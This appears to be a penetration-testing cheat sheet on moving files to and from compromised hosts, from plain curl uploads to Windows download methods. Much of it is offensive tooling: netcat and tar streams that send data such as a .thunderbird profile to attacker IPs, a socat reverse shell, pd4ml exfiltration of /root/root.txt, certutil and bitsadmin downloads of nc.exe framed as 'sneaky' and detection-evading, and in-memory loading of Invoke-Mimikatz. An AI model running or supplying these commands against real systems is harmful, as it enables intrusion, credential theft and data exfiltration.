File Transfer

Listeners and binaries

curl

File Upload

curl -T example.txt https://example.com/upload

File Upload + POST

curl -T example.txt -X POST https://example.com/upload

File upload + Authentication

curl -u user:pass -T example.txt https://example.com/upload

File Upload + Token Authentication

curl -u :YOUR_TOKEN -T example.txt https://example.com/upload

File Upload + Custom Header

curl -H "Authorization: Bearer YOUR_TOKEN" -T example.txt https://example.com/upload

File Upload + Multiple Custom Headers

curl -H "Authorization: Bearer YOUR_TOKEN" -H "Content-Type: application/json" -T example.txt https://example.com/upload

Multiple File Uploads

curl -T file1.txt -T file2.txt https://example.com/upload

File Upload as Form submission

curl -F "file=@example.txt" https://example.com/upload

File Upload + Additional Query Parameters

curl -T example.txt "https://example.com/upload?user=alice&timestamp=2024"

File Upload + Redirect

curl -L -T example.txt https://example.com/upload

File Upload + Retry

curl --retry 5 -T example.txt https://example.com/upload

File Upload to FTP server

curl -T example.txt ftp://ftp.example.com/upload/

File Upload + Custom HTTP Method

curl -X PATCH -T example.txt https://example.com/upload

File transfer on compromised Apache servers

Copy a file into Apache Web Directory

• With the right permissions, you can copy the file to /var/www/html so it can be access from the URL http://<server-ip>/file.txt.

cp archivo.txt /var/www/html

Give ownership to the web user

sudo chown www-data:www-data /var/www/html/archivo.txt

Set the file to be read by everyone

sudo chmod 644 /var/www/html/archivo.txt

Uploading via Apache (web interface)

• Ensure the appropriate upload_max_filesize and post_max_size directives are set in the php.ini file.

• Normally is located here /etc/php/7.x/apache2/php.ini

upload_max_filesize = 50M
post_max_size = 50M

Use pd4ml.jar to exfill files attaching then to the PDF

POC

<html>
  <pd4ml:attachment src="/root/root.txt"/>
</html>

With PHP code execution

One liner

php -r '$file = file_get_contents("https://<snip>/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'

Secure Copy Protocol scp

From local machine to remote host

scp localfile username@remotehost:/path/to/destination/

From remote host to local machine

scp username@remotehost:/path/to/remotefile /local/path/

Specific Port

scp -P 47502 linpeas.sh user1@83.136.252.198:/home/user1

With key

scp -i ~/.ssh/key linpeas.sh professor@10.10.10.131:/home/professor/

From local to Apache Server

scp archivo.txt user@remote-server:/var/www/html/

Python Web Server

python3 -m http.server 443

curl

curl -o IP:Port/file

wget

wget IP:Port/file

Using Netcat

Host

nc -lvp <Local_PORT> > file

Client

nc <Target_IP> <port> < file

With cat

cat <file> | nc Target_IP 443

Use tar for directories

tar -cf - .thunderbird | nc 10.10.16.10 4445

Using Socat

Listener

socat file:`tty`,raw,echo=0 tcp-listen:4444

Target Machine

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

Windows

curl

curl http://ip/file -o <output>

wget

wget http://ip/file -OutFile <output>

certutil

First, start a python web server

python3 -m http.server 443

Then

certutil.exe -f -urlcache -split http://<IP>/<file>

Sneaky Version

certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe

Invoke-WebRequest

First, start a python web-server

python3 -m http.server 443

Then

IWR -uri http://<ip>/<file> -OutFile <file_name>

Uses Chrome User Agent

Invoke-WebRequest http://nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "nc.exe"

Upload a file

Invoke-WebRequest -Uri http://10.10.10.32:443 -Method POST -Body $b64

Impacket

First, create a SMB share folder

impacket-smbserver <share_name> <file_path> -smb2support

Then, copy the files

copy \\<ip>\share\<file> <destination_path>

System.Net.WebClient

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://ip/file', '<output>')

Bitsadmin

Download files stealthily and evade detection, as bitsadmin is a native tool and might be overlooked by some security solutions.

bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe

Modern Version

Start-BitsTransfer -Source http://10.10.10.32/nc.exe -Destination C:\Temp\nc.exe

In-memory execution

Mimikatz

IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1')